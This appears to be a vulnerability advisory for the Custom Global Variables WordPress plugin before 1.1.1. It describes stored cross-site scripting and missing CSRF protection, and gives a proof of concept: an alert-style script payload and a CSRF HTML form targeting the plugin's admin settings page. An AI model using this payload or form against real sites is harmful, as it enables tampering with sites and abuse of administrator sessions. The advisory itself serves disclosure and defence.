WordPress Plugin Vulnerabilities

Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)

Description

The plugin does not sanitise the 'name' field of the variable added in its settings, leading to a Stored Cross-Site Scripting issue. Attackers could also use the lack of CSRF and capability checks to make a logged in administrator add the payload and make them perform further unwanted actions.

Proof of Concept

As an administrator, go to the Settings > Custom Global Variables page, add the following payload ("><script>alert(/XSS/)</script><") in the 'name' field, add whatever value in the 'value' field and submit it

Via CSRF:
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
      <input type="hidden" name="vars[1][name]" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="vars[1][val]" value="a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
custom-global-variables
Fixed in 1.1.1

References

Exploitdb
49406

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.3 (high)

Miscellaneous

Original Researcher
Swapnil Subhash Bodekar
Verified
Yes
WPVDB ID
0480b2e3-5b3d-4eaf-9496-6a135f7cf4c9

Timeline

Publicly Published
2021-01-11 (about 3 years ago)
Added
2021-01-11 (about 3 years ago)
Last Updated
2021-03-10 (about 3 years ago)

Other

Published
Title
Published
2024-04-12
Title
Short URL <= 1.6.8 - Reflected Cross-Site Scripting
Published
2022-12-23
Title
Welcart e-Commerce < 2.8.9 - Contributor+ Stored XSS via Shortcode
Published
2023-10-26
Title
Pre-Orders for WooCommerce < 1.2.14 - Contributor+ Stored XSS
Published
2019-05-08
Title
Ultimate Faqs < 1.8.22 - Cross-Site Scripting (XSS)
Published
2024-02-28
Title
Beaver Builder – WordPress Page Builder < 2.7.4.3 - Contributor+ Stored XSS